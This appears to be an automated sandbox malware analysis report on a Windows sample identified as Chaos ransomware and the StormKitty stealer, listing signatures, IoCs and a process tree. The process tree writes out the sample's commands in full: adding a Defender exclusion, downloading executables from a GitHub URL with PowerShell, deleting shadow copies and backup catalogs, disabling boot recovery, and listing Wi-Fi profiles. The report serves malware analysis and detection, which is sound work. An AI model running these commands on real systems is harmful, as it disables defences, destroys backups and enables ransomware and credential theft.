Analysis
-
max time kernel
106s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 02:34
Behavioral task
behavioral1
Sample
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource
win10v2004-20250314-en
General
-
Target
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral2/files/0x000e0000000240ca-46.dat family_chaos behavioral2/memory/1960-48-0x0000000000BF0000-0x0000000000C18000-memory.dmp family_chaos -
Chaos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000024276-50.dat family_stormkitty behavioral2/memory/4932-62-0x0000000000240000-0x000000000027C000-memory.dmp family_stormkitty -
Stormkitty family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5520 bcdedit.exe 5080 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 10 4328 powershell.exe 16 4328 powershell.exe 34 4260 powershell.exe 35 4260 powershell.exe -
pid Process 4824 wbadmin.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 2 IoCs
flow pid Process 35 4260 powershell.exe 16 4328 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation svchost.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 1960 build.exe 4932 kernelv.exe 1744 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
pid Process 2124 powershell.exe 4328 powershell.exe 4260 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Public\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini svchost.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Public\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Public\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1062200478-553497403-3857448183-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 ipinfo.io 37 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\64irrs21e.jpg" svchost.exe -
resource yara_rule behavioral2/memory/5516-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral2/memory/5516-66-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2124 powershell.exe 844 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3044 4932 WerFault.exe 104 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5064 cmd.exe 6080 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4064 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings svchost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3092 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1744 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2124 powershell.exe 2124 powershell.exe 4328 powershell.exe 4328 powershell.exe 4260 powershell.exe 4260 powershell.exe 1960 build.exe 844 powershell.exe 844 powershell.exe 844 powershell.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 4932 kernelv.exe 4932 kernelv.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1960 build.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe 1744 svchost.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 1960 build.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeDebugPrivilege 4932 kernelv.exe Token: SeDebugPrivilege 1744 svchost.exe Token: SeBackupPrivilege 4628 vssvc.exe Token: SeRestorePrivilege 4628 vssvc.exe Token: SeAuditPrivilege 4628 vssvc.exe Token: SeIncreaseQuotaPrivilege 6108 WMIC.exe Token: SeSecurityPrivilege 6108 WMIC.exe Token: SeTakeOwnershipPrivilege 6108 WMIC.exe Token: SeLoadDriverPrivilege 6108 WMIC.exe Token: SeSystemProfilePrivilege 6108 WMIC.exe Token: SeSystemtimePrivilege 6108 WMIC.exe Token: SeProfSingleProcessPrivilege 6108 WMIC.exe Token: SeIncBasePriorityPrivilege 6108 WMIC.exe Token: SeCreatePagefilePrivilege 6108 WMIC.exe Token: SeBackupPrivilege 6108 WMIC.exe Token: SeRestorePrivilege 6108 WMIC.exe Token: SeShutdownPrivilege 6108 WMIC.exe Token: SeDebugPrivilege 6108 WMIC.exe Token: SeSystemEnvironmentPrivilege 6108 WMIC.exe Token: SeRemoteShutdownPrivilege 6108 WMIC.exe Token: SeUndockPrivilege 6108 WMIC.exe Token: SeManageVolumePrivilege 6108 WMIC.exe Token: 33 6108 WMIC.exe Token: 34 6108 WMIC.exe Token: 35 6108 WMIC.exe Token: 36 6108 WMIC.exe Token: SeIncreaseQuotaPrivilege 6108 WMIC.exe Token: SeSecurityPrivilege 6108 WMIC.exe Token: SeTakeOwnershipPrivilege 6108 WMIC.exe Token: SeLoadDriverPrivilege 6108 WMIC.exe Token: SeSystemProfilePrivilege 6108 WMIC.exe Token: SeSystemtimePrivilege 6108 WMIC.exe Token: SeProfSingleProcessPrivilege 6108 WMIC.exe Token: SeIncBasePriorityPrivilege 6108 WMIC.exe Token: SeCreatePagefilePrivilege 6108 WMIC.exe Token: SeBackupPrivilege 6108 WMIC.exe Token: SeRestorePrivilege 6108 WMIC.exe Token: SeShutdownPrivilege 6108 WMIC.exe Token: SeDebugPrivilege 6108 WMIC.exe Token: SeSystemEnvironmentPrivilege 6108 WMIC.exe Token: SeRemoteShutdownPrivilege 6108 WMIC.exe Token: SeUndockPrivilege 6108 WMIC.exe Token: SeManageVolumePrivilege 6108 WMIC.exe Token: 33 6108 WMIC.exe Token: 34 6108 WMIC.exe Token: 35 6108 WMIC.exe Token: 36 6108 WMIC.exe Token: SeBackupPrivilege 4584 wbengine.exe Token: SeRestorePrivilege 4584 wbengine.exe Token: SeSecurityPrivilege 4584 wbengine.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 5516 wrote to memory of 1720 5516 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe 87 PID 5516 wrote to memory of 1720 5516 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe 87 PID 1720 wrote to memory of 524 1720 cmd.exe 88 PID 1720 wrote to memory of 524 1720 cmd.exe 88 PID 524 wrote to memory of 3752 524 net.exe 89 PID 524 wrote to memory of 3752 524 net.exe 89 PID 1720 wrote to memory of 2124 1720 cmd.exe 90 PID 1720 wrote to memory of 2124 1720 cmd.exe 90 PID 1720 wrote to memory of 4328 1720 cmd.exe 93 PID 1720 wrote to memory of 4328 1720 cmd.exe 93 PID 1720 wrote to memory of 4260 1720 cmd.exe 99 PID 1720 wrote to memory of 4260 1720 cmd.exe 99 PID 1720 wrote to memory of 1960 1720 cmd.exe 103 PID 1720 wrote to memory of 1960 1720 cmd.exe 103 PID 1720 wrote to memory of 4932 1720 cmd.exe 104 PID 1720 wrote to memory of 4932 1720 cmd.exe 104 PID 1720 wrote to memory of 4932 1720 cmd.exe 104 PID 1720 wrote to memory of 844 1720 cmd.exe 105 PID 1720 wrote to memory of 844 1720 cmd.exe 105 PID 4932 wrote to memory of 5064 4932 kernelv.exe 109 PID 4932 wrote to memory of 5064 4932 kernelv.exe 109 PID 4932 wrote to memory of 5064 4932 kernelv.exe 109 PID 5064 wrote to memory of 3728 5064 cmd.exe 111 PID 5064 wrote to memory of 3728 5064 cmd.exe 111 PID 5064 wrote to memory of 3728 5064 cmd.exe 111 PID 5064 wrote to memory of 6080 5064 cmd.exe 112 PID 5064 wrote to memory of 6080 5064 cmd.exe 112 PID 5064 wrote to memory of 6080 5064 cmd.exe 112 PID 5064 wrote to memory of 6028 5064 cmd.exe 113 PID 5064 wrote to memory of 6028 5064 cmd.exe 113 PID 5064 wrote to memory of 6028 5064 cmd.exe 113 PID 4932 wrote to memory of 2988 4932 kernelv.exe 117 PID 4932 wrote to memory of 2988 4932 kernelv.exe 117 PID 4932 wrote to memory of 2988 4932 kernelv.exe 117 PID 2988 wrote to memory of 5460 2988 cmd.exe 119 PID 2988 wrote to memory of 5460 2988 cmd.exe 119 PID 2988 wrote to memory of 5460 2988 cmd.exe 119 PID 2988 wrote to memory of 5112 2988 cmd.exe 120 PID 2988 wrote to memory of 5112 2988 cmd.exe 120 PID 2988 wrote to memory of 5112 2988 cmd.exe 120 PID 1960 wrote to memory of 1744 1960 build.exe 121 PID 1960 wrote to memory of 1744 1960 build.exe 121 PID 1744 wrote to memory of 3460 1744 svchost.exe 123 PID 1744 wrote to memory of 3460 1744 svchost.exe 123 PID 3460 wrote to memory of 4064 3460 cmd.exe 125 PID 3460 wrote to memory of 4064 3460 cmd.exe 125 PID 3460 wrote to memory of 6108 3460 cmd.exe 128 PID 3460 wrote to memory of 6108 3460 cmd.exe 128 PID 1744 wrote to memory of 1436 1744 svchost.exe 129 PID 1744 wrote to memory of 1436 1744 svchost.exe 129 PID 1436 wrote to memory of 5520 1436 cmd.exe 131 PID 1436 wrote to memory of 5520 1436 cmd.exe 131 PID 1436 wrote to memory of 5080 1436 cmd.exe 132 PID 1436 wrote to memory of 5080 1436 cmd.exe 132 PID 1744 wrote to memory of 5952 1744 svchost.exe 133 PID 1744 wrote to memory of 5952 1744 svchost.exe 133 PID 5952 wrote to memory of 4824 5952 cmd.exe 135 PID 5952 wrote to memory of 4824 5952 cmd.exe 135 PID 1744 wrote to memory of 3092 1744 svchost.exe 142 PID 1744 wrote to memory of 3092 1744 svchost.exe 142 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:3752
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:4064
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:5520
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:5080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
- Suspicious use of WriteProcessMemory
PID:5952 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:4824
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt5⤵
- Opens file in notepad (likely ransom note)
PID:3092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kernelv.exe"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4932 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:3728
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6080
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:6028
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 24564⤵
- Program crash
PID:3044
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:5460
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5112
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4932 -ip 49321⤵PID:5900
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
